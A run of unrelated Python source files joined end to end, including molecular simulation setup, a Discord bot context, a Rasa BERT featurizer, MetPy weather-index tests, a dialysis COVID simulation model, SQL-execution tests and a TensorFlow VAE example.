recommended that "\ "structures are minimized and verified by the user before "\ "running SEEKR, since minimizations might cause the system "\ "to drift out of the MMVT cell.") sim_openmm.simulation.minimizeEnergy() assert sim_openmm.timestep is not None return def create_sim_openmm(model, anchor, output_filename, state_prefix=None, frame=0): """ Take all relevant model and anchor information and generate the necessary OpenMM objects to run the simulation. Parameters ---------- model : Model() The Model which contains the anchor and all settings for the simulation that is about to be run. anchor : Anchor() The anchor object that this OpenMM simulation applies to. output_filename : str The name of the file that will be written by the plugin as the MMVT simulation proceeds, recording every 'bounce'. state_prefix : str or None The plugin can optionally save every state during a bounce. These can be used to seed simulations in other cells. This argument provides the file prefix for these saved states. If None, then no states will be written. frame : int Which frame of the starting positions file to retrieve. Returns ------- sim_openmm : Sim_openmm() The sim_openmm object, which contains everything needed to run an MMVT simulation within OpenMM. """ sim_openmm = MMVT_sim_openmm() common_sim_openmm.fill_generic_parameters( sim_openmm, model, anchor, output_filename) system, topology, positions, box_vectors \ = common_sim_openmm.create_openmm_system(sim_openmm, model, anchor) sim_openmm.system = system add_integrator(sim_openmm, model, state_prefix=state_prefix) common_sim_openmm.add_barostat(sim_openmm, model) common_sim_openmm.add_platform(sim_openmm, model) add_forces(sim_openmm, model, anchor) add_simulation(sim_openmm, model, topology, positions, box_vectors, frame) return sim_openmm def make_mmvt_boundary_definitions(cv, milestone): """ Take a Collective_variable object and a particular milestone and return an OpenMM Force() object that the plugin can use to monitor crossings. Parameters ---------- cv : Collective_variable() A Collective_variable object which contains all the information for the collective variable describine this variable. In fact, the boundaries are contours of the function described by cv. This variable contains information like the groups of atoms involved with the CV, and the expression which describes the function. milestone : Milestone() A Milestone object which describes the boundary between two Voronoi cells. This variable contains information like the values of the variables which will be entered into the Force() object. Returns ------- myforce : openmm.Force() An OpenMM force object which does not affect atomic motion, but allows us to conveniently monitor a function of atomic position. """ myforce = cv.make_force_object() myforce.setForceGroup(1) variable_names_list = cv.add_parameters(myforce) cv.add_groups_and_variables(myforce, cv.get_variable_values_list( milestone)) return myforce def get_starting_structure_num_frames(model, anchor, dummy_outfile): """ For an anchor's starting structure, find and return the number of frames. """ sim_openmm = MMVT_sim_openmm() common_sim_openmm.fill_generic_parameters( sim_openmm, model, anchor, dummy_outfile) dummy_system, dummy_topology, positions, dummy_box_vectors \ = common_sim_openmm.create_openmm_system(sim_openmm, model, anchor) num_frames = 0 if positions is not None: num_frames = positions.getNumFrames() return num_frames 1-10 from discord.ext import commands class DataBase: def __init__(self, psql=None, redis=None): self.psql = psql self.redis = redis class Context(commands.Context): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.db = DataBase(self.bot.pool, self.bot.redis) self.color = self.bot.color self.running = None self.debug = kwargs.get("debug", False) self.beta = kwargs.get("beta", False) async def send(self, content: str = None, **kwargs): if not self.interaction: if "mention_author" not in kwargs: kwargs["mention_author"] = False kwargs["reference"] = self.message return await super().send(content, **kwargs) # -*- coding: UTF-8 -*- import logging import os import re from typing import Any, Dict, List, Optional, Text from rasa_nlu import utils from rasa_nlu.featurizers import Featurizer from rasa_nlu.training_data import Message from rasa_nlu.components import Component from rasa_nlu.model import Metadata from rasa_nlu.training_data.training_data import TrainingData from rasa_nlu.config import RasaNLUModelConfig from rasa_nlu.tokenizers import jieba_tokenizer import jieba from bert_serving.client import ConcurrentBertClient import numpy as np from tqdm import tqdm logger = logging.getLogger(__name__) class BertFeaturizer(Featurizer): provides = [] requires = [] defaults = { "ip": 'localhost', "port": '8125', "port_out": '5556', "show_server_config": False, "output_fmt": 'ndarray', "check_version": False, "identity": None, "batch_size": 128 } language_list = None def __init__(self, component_config): super(BertFeaturizer, self).__init__(component_config) ip = self.component_config['ip'] port = self.component_config['port'] port_out = self.component_config['port_out'] show_server_config = self.component_config['show_server_config'] output_fmt = self.component_config['output_fmt'] check_version = self.component_config['check_version'] timeout = self.component_config['timeout'] identity = self.component_config['identity'] self.concurrent_bertClient = ConcurrentBertClient( ip = ip, port = int(port), port_out = int(port_out), show_server_config = show_server_config, output_fmt = output_fmt, check_version = check_version, timeout = timeout, identity = identity, check_length= False ) @classmethod def required_packages(cls) -> List[Text]: return ["numpy", "bert_serving"] @classmethod def load(cls, meta: Dict[Text, Any], model_dir: Optional[Text] = None, model_metadata: Optional["Metadata"] = None, cached_component: Optional["Component"] = None, **kwargs: Any ) -> "Component": return cls(meta) def _get_message_text(self, messages): # all_tokens = [message.data['tokens'] for message in messages] all_tokens = [list(jieba.cut(message.text)) for message in messages] bert_embedding = self.concurrent_bertClient.encode(all_tokens, is_tokenized=True) return np.squeeze(bert_embedding) def train(self, training_data: TrainingData, cfg: RasaNLUModelConfig = None, **kwargs: Any) -> None: batch_size = self.component_config['batch_size'] epochs = len(training_data.intent_examples) // batch_size + \ int(len(training_data.intent_examples) % batch_size > 0) for ep in tqdm(range(epochs), desc="Epochs"): end_index = (ep+1) * batch_size start_index = ep * batch_size examples = training_data.intent_examples[start_index: end_index] tokens = self._get_message_text(examples) X = np.array(tokens) for index, example in enumerate(examples): example.set("text_features", self._combine_with_existing_text_features(example, X[index])) def process(self, message: Message, **kwargs) -> None: features = self._get_message_text([message]) message.set("text_features", self._combine_with_existing_text_features(message, features)) 1-10 import cv2 import mediapipe import numpy as np import csv import sys import getopt def pic_to_mesh(imagepath): faceModule = mediapipe.solutions.face_mesh with faceModule.FaceMesh(static_image_mode=True) as face: image = cv2.imread(imagepath) results = face.process(cv2.cvtColor(image, cv2.COLOR_BGR2RGB)) point_values = [] for facial_landmarks in results.multi_face_landmarks: point_values = [] for i in range(0, 468): pt1 = facial_landmarks.landmark[i] point_values.append(pt1.x) point_values.append(pt1.y) point_values.append(pt1.z) return point_values def persist_row_to_csv(point_values, output_file): # persist to CSV with open(output_file, 'a') as f: # using csv.writer method from CSV package write = csv.writer(f, lineterminator='\r\n') write.writerow(point_values) def main(argv): inputfile = '' outputfile = 'image_mesh.csv' try: opts, args = getopt.getopt(argv, "hi:o:", ["ifile=", "ofile="]) except getopt.GetoptError: print('test.py -i -o ') sys.exit(2) for opt, arg in opts: if opt == '-h': print('pic_to_facemesh.py -i -o ') sys.exit() elif opt in ("-i", "--inputimage"): inputfile = arg elif opt in ("-o", "--outputcsv"): outputfile = arg if inputfile == '': raise ValueError('Input Image must be provided.') persist_row_to_csv(pic_to_mesh(inputfile), outputfile) print("Image Facemesh of {} has been persisted to file: {}!".format(inputfile, outputfile)) if __name__ == "__main__": main(sys.argv[1:]) # Copyright (c) 2017,2019 MetPy Developers. # Distributed under the terms of the BSD 3-Clause License. # SPDX-License-Identifier: BSD-3-Clause """Test the `indices` module.""" from datetime import datetime import numpy as np from metpy.calc import (bulk_shear, bunkers_storm_motion, critical_angle, mean_pressure_weighted, precipitable_water, significant_tornado, supercell_composite) from metpy.testing import (assert_almost_equal, assert_array_equal, check_and_silence_warning, get_upper_air_data) from metpy.units import concatenate, units @check_and_silence_warning(FutureWarning) def test_precipitable_water(): """Test precipitable water with observed sounding.""" data = get_upper_air_data(datetime(2016, 5, 22, 0), 'DDC') pw = precipitable_water(data['dewpoint'], data['pressure'], top=400 * units.hPa) truth = (0.8899441949243486 * units('inches')).to('millimeters') assert_array_equal(pw, truth) @check_and_silence_warning(FutureWarning) def test_precipitable_water_no_bounds(): """Test precipitable water with observed sounding and no bounds given.""" data = get_upper_air_data(datetime(2016, 5, 22, 0), 'DDC') dewpoint = data['dewpoint'] pressure = data['pressure'] inds = pressure >= 400 * units.hPa pw = precipitable_water(dewpoint[inds], pressure[inds]) truth = (0.8899441949243486 * units('inches')).to('millimeters') assert_array_equal(pw, truth) @check_and_silence_warning(FutureWarning) def test_precipitable_water_bound_error(): """Test with no top bound given and data that produced floating point issue #596.""" pressure = np.array([993., 978., 960.5, 927.6, 925., 895.8, 892., 876., 45.9, 39.9, 36., 36., 34.3]) * units.hPa dewpoint = np.array([25.5, 24.1, 23.1, 21.2, 21.1, 19.4, 19.2, 19.2, -87.1, -86.5, -86.5, -86.5, -88.1]) * units.degC pw = precipitable_water(dewpoint, pressure) truth = 89.86955998646951 * units('millimeters') assert_almost_equal(pw, truth, 8) @check_and_silence_warning(FutureWarning) def test_precipitable_water_nans(): """Test that PW returns appropriate number if NaNs are present.""" pressure = np.array([1001, 1000, 997, 977.9, 977, 957, 937.8, 925, 906, 899.3, 887, 862.5, 854, 850, 800, 793.9, 785, 777, 771, 762, 731.8, 726, 703, 700, 655, 630, 621.2, 602, 570.7, 548, 546.8, 539, 513, 511, 485, 481, 468, 448, 439, 424, 420, 412]) * units.hPa dewpoint = np.array([-25.1, -26.1, -26.8, np.nan, -27.3, -28.2, np.nan, -27.2, -26.6, np.nan, -27.4, np.nan, -23.5, -23.5, -25.1, np.nan, -22.9, -17.8, -16.6, np.nan, np.nan, -16.4, np.nan, -18.5, -21., -23.7, np.nan, -28.3, np.nan, -32.6, np.nan, -33.8, -35., -35.1, -38.1, -40., -43.3, -44.6, -46.4, -47., -49.2, -50.7]) * units.degC pw = precipitable_water(dewpoint, pressure) truth = 4.003709214463873 * units.mm assert_almost_equal(pw, truth, 8) def test_mean_pressure_weighted(): """Test pressure-weighted mean wind function with vertical interpolation.""" data = get_upper_air_data(datetime(2016, 5, 22, 0), 'DDC') u, v = mean_pressure_weighted(data['pressure'], data['u_wind'], data['v_wind'], heights=data['height'], depth=6000 * units('meter')) assert_almost_equal(u, 6.0208700094534775 * units('m/s'), 7) assert_almost_equal(v, 7.966031839967931 * units('m/s'), 7) def test_mean_pressure_weighted_elevated(): """Test pressure-weighted mean wind function with a base above the surface.""" data = get_upper_air_data(datetime(2016, 5, 22, 0), 'DDC') u, v = mean_pressure_weighted(data['pressure'], data['u_wind'], data['v_wind'], heights=data['height'], depth=3000 * units('meter'), bottom=data['height'][0] + 3000 * units('meter')) assert_almost_equal(u, 8.270829843626476 * units('m/s'), 7) assert_almost_equal(v, 1.7392601775853547 * units('m/s'), 7) def test_bunkers_motion(): """Test Bunkers storm motion with observed sounding.""" data = get_upper_air_data(datetime(2016, 5, 22, 0), 'DDC') motion = concatenate(bunkers_storm_motion(data['pressure'], data['u_wind'], data['v_wind'], data['height'])) truth = [1.4537892577864744, 2.0169333025630616, 10.587950761120482, 13.915130377372801, 6.0208700094534775, 7.9660318399679308] * units('m/s') assert_almost_equal(motion.flatten(), truth, 8) def test_bulk_shear(): """Test bulk shear with observed sounding.""" data = get_upper_air_data(datetime(2016, 5, 22, 0), 'DDC') u, v = bulk_shear(data['pressure'], data['u_wind'], data['v_wind'], heights=data['height'], depth=6000 * units('meter')) truth = [29.899581266946115, -14.389225800205509] * units('knots') assert_almost_equal(u.to('knots'), truth[0], 8) assert_almost_equal(v.to('knots'), truth[1], 8) def test_bulk_shear_no_depth(): """Test bulk shear with observed sounding and no depth given. Issue #568.""" data = get_upper_air_data(datetime(2016, 5, 22, 0), 'DDC') u, v = bulk_shear(data['pressure'], data['u_wind'], data['v_wind'], heights=data['height']) truth = [20.225018939, 22.602359692] * units('knots') assert_almost_equal(u.to('knots'), truth[0], 8) assert_almost_equal(v.to('knots'), truth[1], 8) def test_bulk_shear_elevated(): """Test bulk shear with observed sounding and a base above the surface.""" data = get_upper_air_data(datetime(2016, 5, 22, 0), 'DDC') u, v = bulk_shear(data['pressure'], data['u_wind'], data['v_wind'], heights=data['height'], bottom=data['height'][0] + 3000 * units('meter'), depth=3000 * units('meter')) truth = [0.9655943923302139, -3.8405428777944466] * units('m/s') assert_almost_equal(u, truth[0], 8) assert_almost_equal(v, truth[1], 8) def test_supercell_composite(): """Test supercell composite function.""" mucape = [2000., 1000., 500., 2000.] * units('J/kg') esrh = [400., 150., 45., 45.] * units('m^2/s^2') ebwd = [30., 15., 5., 5.] * units('m/s') truth = [16., 2.25, 0., 0.] supercell_comp = supercell_composite(mucape, esrh, ebwd) assert_array_equal(supercell_comp, truth) def test_supercell_composite_scalar(): """Test supercell composite function with a single value.""" mucape = 2000. * units('J/kg') esrh = 400. * units('m^2/s^2') ebwd = 30. * units('m/s') truth = 16. supercell_comp = supercell_composite(mucape, esrh, ebwd) assert_almost_equal(supercell_comp, truth, 6) def test_sigtor(): """Test significant tornado parameter function.""" sbcape = [2000., 2000., 2000., 2000., 3000, 4000] * units('J/kg') sblcl = [3000., 1500., 500., 1500., 1500, 800] * units('meter') srh1 = [200., 200., 200., 200., 300, 400] * units('m^2/s^2') shr6 = [20., 5., 20., 35., 20., 35] * units('m/s') truth = [0., 0, 1.777778, 1.333333, 2., 10.666667] sigtor = significant_tornado(sbcape, sblcl, srh1, shr6) assert_almost_equal(sigtor, truth, 6) def test_sigtor_scalar(): """Test significant tornado parameter function with a single value.""" sbcape = 4000 * units('J/kg') sblcl = 800 * units('meter') srh1 = 400 * units('m^2/s^2') shr6 = 35 * units('m/s') truth = 10.666667 sigtor = significant_tornado(sbcape, sblcl, srh1, shr6) assert_almost_equal(sigtor, truth, 6) def test_critical_angle(): """Test critical angle with observed sounding.""" data = get_upper_air_data(datetime(2016, 5, 22, 0), 'DDC') ca = critical_angle(data['pressure'], data['u_wind'], data['v_wind'], data['height'], stormu=0 * units('m/s'), stormv=0 * units('m/s')) truth = [140.0626637513269] * units('degrees') assert_almost_equal(ca, truth, 8) def test_critical_angle_units(): """Test critical angle with observed sounding and different storm motion units.""" data = get_upper_air_data(datetime(2016, 5, 22, 0), 'DDC') # Set storm motion in m/s ca_ms = critical_angle(data['pressure'], data['u_wind'], data['v_wind'], data['height'], stormu=10 * units('m/s'), stormv=10 * units('m/s')) # Set same storm motion in kt and m/s ca_kt_ms = critical_angle(data['pressure'], data['u_wind'], data['v_wind'], data['height'], stormu=10 * units('m/s'), stormv=19.4384449244 * units('kt')) # Make sure the resulting critical angles are equal assert_almost_equal(ca_ms, ca_kt_ms, 8) src/ex4/split_iterable.py def split_iterable(xs, y): answer, part = [], [] for element in xs: if element == y: answer.append(part) part = [] else: part.append(element) answer.append(part) return answer import pandas as pd import random class Patient: """ Patient object. Object attributes ----------------- _allocate: Reference to patient-unit allocation object _env: Reference to model environment object _params: Reference to sceanrio paraemters object _pop: Reference to patient population object _units: Reference to unit object current_travel_time: current time to allocated unit current_unit: current unit patent allocated to current_unit_location: postcode of current unit default_time: time to unit patient allocated to in patient info CSV default_unit: unit patient allocated to in patient info CSV default_unit_location: postcode of default unit displaced: Whether patient is dispalced from default unit (True/False) displaced_additional_time: Additional travel time if displaced dialysis_type: Dialysis type (HD unit or home) first_day: First day of the week for dialysis (Mon or Tues) inpatient_los: inpatient length of stay if inpatient stay required location: Patient home location (postcode sector) patient_id: id of patient (allocated in model) require_inpatient: Whether patient will need inpation care (True/False) session: Current session at unit status: COVID status (negative, positive, recovered, died) time_in: Sim time patient created time_positive: Amount of time spent as COVID +ve outpatient time_to_infection: Time from mdoel start that patient becomes infected unallocated_to_session: Currently unallocated to any saession (True/False) will_be_infected: Patient will be infected in model (True/False) Methods ------- patient_virus_progress: Progress patient through negative --> positive --> recover or die. Death occurs at end of positive episode. Patient may start the model in any state """ def __init__(self, env, patient_data, allocate, params, pop, units): """Constructor method for new patient. Patient data is passed as a dictionary""" self._allocate = allocate self.current_travel_time = 0 self.current_unit = patient_data['default_unit'] self.current_unit_location = patient_data['default_unit_location'] self.default_time = 0 self.default_unit = patient_data['default_unit'] self.default_unit_location = patient_data['default_unit_location'] self.displaced = False self.displaced_additional_time = 0 self.dialysis_type = patient_data['dialysis_type'] self._env = env self.first_day = patient_data['first_day'] self.inpatient_los = patient_data['inpatient_los'] self.location = patient_data['location'] self._params = params self.patient_id = patient_data['patient_id'] self._pop = pop self.require_inpatient = patient_data['require_inpatient'] self.session = 'none' self.status = patient_data['status'] self.time_in = env.now self.time_positive = patient_data['time_positive'] self.time_to_infection = patient_data['time_to_infection'] self.unallocated_to_session = False self._units = units self.will_be_infected = patient_data['will_be_infected'] # Add travel times to non-home : if self.default_unit_location != 'HOME': self.current_travel_time = units.travel_times.loc[patient_data['location']][ patient_data['default_unit_location']] self.default_time = self.current_travel_time self.displaced_additional_time = 0 # Apply random positives if (self.status == 'negative' and random.random() < self._params.random_positive_rate_at_start): self.status = 'positive' def patient_virus_progress(self): """ Progress patient through negative --> positive --> recover or die. Death occurs at end of positive episode. Patient may start the model in any state. """ # Period as negative COVID if self.status == 'negative': # Period of cov negative: yield self._env.timeout(self.time_to_infection) # End of negative period, remove from patient allocation self._allocate.remove_patient(self) # Switch status to positive and re-allocate self.status = 'positive' # If previously unallocated, remove from list of unallocated patients if self in self._pop.unallocated_patients: self._pop.unallocated_patients.remove(self) # Allocate patient self._allocate.allocate_patient(self) # Add to appropriate patient list self._pop.positive_patients.append(self) # Period of positive COVID if self.status == 'positive': # Period of Cov positive yield self._env.timeout(self.time_positive) # End of positive period, remove from patient allocation and reset location self._allocate.remove_patient(self) # If previously unallocated, remove from list of unallocated patients if self in self._pop.unallocated_patients: self._pop.unallocated_patients.remove(self) # Check for inpatient stay if self.require_inpatient: self.status = 'inpatient' self._pop.inpatients.append(self) self._allocate.allocate_inpatient(self) # Time in inpatient yield self._env.timeout(self.inpatient_los) self._pop.inpatients.remove(self) self._allocate.inpatient_counts.loc[self.current_unit] -= 1 # Check for mortality at end of positive (+ inpatient) phase if self._params.mortality_rand.sample() < self._params.mortality: # PATIENT DIES self.status = 'died' # Add to appropriate patient list self._pop.died_patients.append(self) # No allocation of patient required self.current_unit = 'none' self.session = 'none' else: # PATIENT RECOVERS self.status = 'recovered' # Allocate patient self._allocate.allocate_patient(self) # Add to appropriate patient list self._pop.recovered_patients.append(self) from os import chdir, getcwd, path import ahjo.database_utilities.sqla_utilities as ahjo import pytest from yaml import safe_load MSSQL_PATTERNS = ahjo.get_dialect_patterns('mssql') POSTGRESQL_PATTERNS = ahjo.get_dialect_patterns('postgresql') @pytest.mark.parametrize("file_name", ['store.vwClients_UTF_16']) def test_execute_from_file_should_raise_error_if_file_is_not_utf_8_bom(mssql_sample, file_name): sql_file = path.join(mssql_sample, f'database/error/{file_name}.sql') with pytest.raises(ValueError): ahjo.execute_from_file(None, sql_file) @pytest.mark.mssql class TestWithSQLServer(): @pytest.fixture(scope='function', autouse=True) def exec_from_file_mssql_setup_and_teardown(self, ahjo_config, mssql_sample, mssql_engine, run_alembic_action, drop_mssql_objects): self.config = ahjo_config(mssql_sample) self.alembic_table = self.config['alembic_version_table_schema'] + \ '.' + self.config['alembic_version_table'] self.engine = mssql_engine old_cwd = getcwd() chdir(mssql_sample) run_alembic_action('upgrade', 'head') yield drop_mssql_objects(self.engine) run_alembic_action('downgrade', 'base') query = f"DROP TABLE {self.alembic_table}" self.engine.execute(query) chdir(old_cwd) @pytest.mark.parametrize("object_name", ['store.vwClients', 'store.vwProducts']) def test_execute_from_file_should_create_view(self, object_name): schema, name = object_name.split('.') query = "SELECT * FROM INFORMATION_SCHEMA.VIEWS WHERE TABLE_SCHEMA = ? AND TABLE_NAME = ?" result = self.engine.execute(query, (schema, name)).fetchall() assert not result ahjo.execute_from_file( self.engine, f'database/views/{object_name}.sql' ) result = self.engine.execute(query, (schema, name)).fetchall() assert len(result) == 1 # possibility to parametrize def test_execute_from_file_should_insert_data(self): object_name = 'store.ProductCategory' query = f"SELECT COUNT(*) FROM {object_name}" result = self.engine.execute(query).fetchall() assert result[0] == (0,) ahjo.execute_from_file(self.engine, f'database/data/{object_name}.sql') result = self.engine.execute(query).fetchall() assert result[0] == (3,) @pytest.mark.mssql class TestWithPopulatedSQLServer(): @pytest.fixture(scope='function', autouse=True) def exec_from_file_mssql_setup_and_teardown(self, ahjo_config, mssql_sample, mssql_engine, run_alembic_action, deploy_mssql_objects, drop_mssql_objects, populate_table): self.config = ahjo_config(mssql_sample) self.alembic_table = self.config['alembic_version_table_schema'] + \ '.' + self.config['alembic_version_table'] self.engine = mssql_engine old_cwd = getcwd() chdir(mssql_sample) run_alembic_action('upgrade', 'head') deploy_mssql_objects(self.engine) populate_table(self.engine, 'store.Clients') populate_table(self.engine, 'store.Products') yield drop_mssql_objects(self.engine) run_alembic_action('downgrade', 'base') query = f"DROP TABLE {self.alembic_table}" self.engine.execute(query) chdir(old_cwd) @pytest.mark.parametrize("query_name,result_set", [ ('clients_are_populated', [['QUESTION', 'ANSWER'], ('Is Clients Populated?', 'YES')]), # nopep8 ('products_are_populated', []) # script has insufficient NOCOUNT setting # nopep8 ]) def test_execute_from_file_should_return_query_results(self, query_name, result_set): query_result = ahjo.execute_from_file( self.engine, f'database/tests/{query_name}.sql', include_headers=True ) assert query_result == result_set @pytest.mark.parametrize("query_name,result_set", [ ('table_row_count', [['Table name', 'Row count'], ('Clients', 5), ('Products', 3)]) # nopep8 ]) def test_execute_from_file_should_handle_variables(self, query_name, result_set, test_db_name): query_result = ahjo.execute_from_file( self.engine, f'database/tests/{query_name}.sql', scripting_variables={"DB_NAME": test_db_name}, include_headers=True ) assert query_result == result_set def get_query(dialect_name, query_key): """Get query used in test from config.""" current_dir = path.dirname(path.realpath(__file__)) query_file_path = path.join(current_dir, 'test_execute_from_file.yaml') with open(query_file_path, 'r') as f: queries = safe_load(f) return queries[dialect_name][query_key] @pytest.mark.parametrize("scripting_variables", [None, 'testi', ['value'], 10]) def test_insert_script_variables_should_raise_error_if_not_dict(scripting_variables): sql = get_query('mssql', 'query1')['sql_with_variables'] with pytest.raises(AttributeError): ahjo._insert_script_variables( dialect_patterns=MSSQL_PATTERNS, sql=sql, scripting_variables=scripting_variables ) def test_insert_script_variables_should_not_do_anything_if_empty_dict(): sql_before = get_query('mssql', 'query1')['sql_with_variables'] sql_after = ahjo._insert_script_variables( dialect_patterns=MSSQL_PATTERNS, sql=sql_before, scripting_variables={} ) assert sql_before == sql_after @pytest.mark.parametrize('query_key', ['query1']) def test_insert_script_variables_with_no_dialect(query_key): query = get_query('empty', query_key) sql_without_variables = ahjo._insert_script_variables( dialect_patterns={}, sql=query['sql_with_variables'], scripting_variables=query['variables'] ) for key in query['variables']: assert key not in sql_without_variables assert sql_without_variables == query['sql_with_value'] @pytest.mark.parametrize('query_key', ['query1']) def test_insert_script_variables_with_mssql(query_key): query = get_query('mssql', query_key) tsql_without_variables = ahjo._insert_script_variables( dialect_patterns=MSSQL_PATTERNS, sql=query['sql_with_variables'], scripting_variables=query['variables'] ) for key in query['variables']: assert key not in tsql_without_variables assert tsql_without_variables == query['sql_with_value'] # test_insert_script_variables_with_postgresql @pytest.mark.parametrize('query_key', ['query1']) def test_split_to_batches_with_empty_dialect_should_not_split(query_key): query = get_query('empty', query_key) batches = ahjo._split_to_batches( dialect_patterns={}, sql=query['sql_with_value'] ) assert len(batches) == 1 assert batches[0] == query['sql_with_value'] @pytest.mark.parametrize('query_key', ['query1', 'query2']) def test_split_to_batches_with_mssql_dialect_should_split_with_go(query_key): query = get_query('mssql', query_key) batches = ahjo._split_to_batches( dialect_patterns=MSSQL_PATTERNS, sql=query['sql_with_value'] ) assert len(batches) == len(query['batches']) for i in range(len(batches)): assert batches[i] == query['batches'][i] @pytest.mark.parametrize('query_key', ['query1']) def test_split_to_batches_with_postgresql_dialect_should_split_with_semicolon(query_key): query = get_query('postgresql', query_key) batches = ahjo._split_to_batches( dialect_patterns=POSTGRESQL_PATTERNS, sql=query['sql_with_value'] ) assert len(batches) == len(query['batches']) for i in range(len(batches)): assert batches[i] == query['batches'][i] # -*- coding: utf-8 -*- import codecs import functools import sys import warnings from argparse import ArgumentParser import tensorflow as tf from pprint import pformat from sklearn.metrics import accuracy_score from tensorflow.contrib.framework import arg_scope, add_arg_scope import tfsnippet as spt from tfsnippet.examples.utils import (MLResults, save_images_collection, ClusteringClassifier, bernoulli_as_pixel, bernoulli_flow, print_with_title) class ExpConfig(spt.Config): # model parameters x_dim = 784 z_dim = 16 n_clusters = 16 l2_reg = 0.0001 p_z_given_y_std = spt.ConfigField( str, default='unbound_logstd', choices=[ 'one', 'one_plus_softplus_std', 'softplus_logstd', 'unbound_logstd' ] ) mean_field_assumption_for_q = False # training parameters result_dir = None write_summary = False max_epoch = 3000 max_step = None batch_size = 128 vi_algorithm = spt.ConfigField( str, default='vimco', choices=['reinforce', 'vimco']) train_n_samples = 25 initial_lr = 0.001 lr_anneal_factor = 0.5 lr_anneal_epoch_freq = 300 lr_anneal_step_freq = None # evaluation parameters test_n_samples = 500 test_batch_size = 128 config = ExpConfig() @spt.global_reuse def gaussian_mixture_prior(y, z_dim, n_clusters): # derive the learnt z_mean prior_mean = spt.model_variable( 'z_prior_mean', dtype=tf.float32, shape=[n_clusters, z_dim], initializer=tf.random_normal_initializer() ) z_mean = tf.nn.embedding_lookup(prior_mean, y) # derive the learnt z_std z_logstd = z_std = None if config.p_z_given_y_std == 'one': z_logstd = tf.zeros_like(z_mean) else: prior_std_or_logstd = spt.model_variable( 'z_prior_std_or_logstd', dtype=tf.float32, shape=[n_clusters, z_dim], initializer=tf.zeros_initializer() ) z_std_or_logstd = tf.nn.embedding_lookup(prior_std_or_logstd, y) if config.p_z_given_y_std == 'one_plus_softplus_std': z_std = 1. + tf.nn.softplus(z_std_or_logstd) elif config.p_z_given_y_std == 'softplus_logstd': z_logstd = tf.nn.softplus(z_std_or_logstd) else: assert(config.p_z_given_y_std == 'unbound_logstd') z_logstd = z_std_or_logstd return spt.Normal(mean=z_mean, std=z_std, logstd=z_logstd) @spt.global_reuse @add_arg_scope def q_net(x, observed=None, n_samples=None): net = spt.BayesianNet(observed=observed) # compute the hidden features with arg_scope([spt.layers.dense], activation_fn=tf.nn.leaky_relu, kernel_regularizer=spt.layers.l2_regularizer(config.l2_reg)): h_x = tf.to_float(x) h_x = spt.layers.dense(h_x, 500) h_x = spt.layers.dense(h_x, 500) # sample y ~ q(y|x) y_logits = spt.layers.dense(h_x, config.n_clusters, name='y_logits') y = net.add('y', spt.Categorical(y_logits), n_samples=n_samples) y_one_hot = tf.one_hot(y, config.n_clusters, dtype=tf.float32) # sample z ~ q(z|y,x) with arg_scope([spt.layers.dense], activation_fn=tf.nn.leaky_relu, kernel_regularizer=spt.layers.l2_regularizer(config.l2_reg)): if config.mean_field_assumption_for_q: # by mean-field-assumption we let q(z|y,x) = q(z|x) h_z = h_x z_n_samples = n_samples else: if n_samples is not None: h_z = tf.concat( [ tf.tile(tf.reshape(h_x, [1, -1, 500]), tf.stack([n_samples, 1, 1])), y_one_hot ], axis=-1 ) else: h_z = tf.concat([h_x, y_one_hot], axis=-1) h_z = spt.layers.dense(h_z, 500) z_n_samples = None z_mean = spt.layers.dense(h_z, config.z_dim, name='z_mean') z_logstd = spt.layers.dense(h_z, config.z_dim, name='z_logstd') z = net.add('z', spt.Normal(mean=z_mean, logstd=z_logstd, is_reparameterized=False), n_samples=z_n_samples, group_ndims=1) return net @spt.global_reuse @add_arg_scope def p_net(observed=None, n_y=None, n_z=None, n_samples=None): if n_samples is not None: warnings.warn('`n_samples` is deprecated, use `n_y` instead.') n_y = n_samples net = spt.BayesianNet(observed=observed) # sample y y = net.add('y', spt.Categorical(tf.zeros([1, config.n_clusters])), n_samples=n_y) # sample z ~ p(z|y) z = net.add('z', gaussian_mixture_prior(y, config.z_dim, config.n_clusters), group_ndims=1, n_samples=n_z, is_reparameterized=False) # compute the hidden features for x with arg_scope([spt.layers.dense], activation_fn=tf.nn.leaky_relu, kernel_regularizer=spt.layers.l2_regularizer(config.l2_reg)): h_x = z h_x = spt.layers.dense(h_x, 500) h_x = spt.layers.dense(h_x, 500) # sample x ~ p(x|z) x_logits = spt.layers.dense(h_x, config.x_dim, name='x_logits') x = net.add('x', spt.Bernoulli(logits=x_logits), group_ndims=1) return net @spt.global_reuse def reinforce_baseline_net(x): with arg_scope([spt.layers.dense], kernel_regularizer=spt.layers.l2_regularizer(config.l2_reg), activation_fn=tf.nn.leaky_relu): h_x = tf.to_float(x) h_x = spt.layers.dense(h_x, 500) h_x = tf.squeeze(spt.layers.dense(h_x, 1), axis=-1) return h_x def main(): # parse the arguments arg_parser = ArgumentParser() spt.register_config_arguments(config, arg_parser, title='Model options') spt.register_config_arguments(spt.settings, arg_parser, prefix='tfsnippet', title='TFSnippet options') arg_parser.parse_args(sys.argv[1:]) # print the config print_with_title('Configurations', pformat(config.to_dict()), after='\n') # open the result object and prepare for result directories results = MLResults(config.result_dir) results.save_config(config) # save experiment settings for review results.make_dirs('plotting', exist_ok=True) results.make_dirs('train_summary', exist_ok=True) # input placeholders input_x = tf.placeholder( dtype=tf.int32, shape=(None, config.x_dim), name='input_x') learning_rate = spt.AnnealingVariable( 'learning_rate', config.initial_lr, config.lr_anneal_factor) # derive the loss and lower-bound for training with tf.name_scope('training'): train_q_net = q_net( input_x, n_samples=config.train_n_samples ) train_chain = train_q_net.chain( p_net, latent_axis=0, observed={'x': input_x}) if config.vi_algorithm == 'reinforce': baseline = reinforce_baseline_net(input_x) vae_loss = tf.reduce_mean( train_chain.vi.training.reinforce(baseline=baseline)) else: assert(config.vi_algorithm == 'vimco') vae_loss = tf.reduce_mean(train_chain.vi.training.vimco()) loss = vae_loss + tf.losses.get_regularization_loss() # derive the nll and logits output for testing with tf.name_scope('testing'): test_q_net = q_net( input_x, n_samples=config.test_n_samples ) test_chain = test_q_net.chain( p_net, latent_axis=0, observed={'x': input_x}) test_nll = -tf.reduce_mean( test_chain.vi.evaluation.is_loglikelihood()) # derive the classifier via q(y|x) q_y_given_x = tf.argmax(test_q_net['y'].distribution.logits, axis=-1, name='q_y_given_x') # derive the optimizer with tf.name_scope('optimizing'): optimizer = tf.train.AdamOptimizer(learning_rate) params = tf.trainable_variables() grads = optimizer.compute_gradients(loss, var_list=params) with tf.control_dependencies( tf.get_collection(tf.GraphKeys.UPDATE_OPS)): train_op = optimizer.apply_gradients(grads) # derive the plotting function with tf.name_scope('plotting'): plot_p_net = p_net( observed={'y': 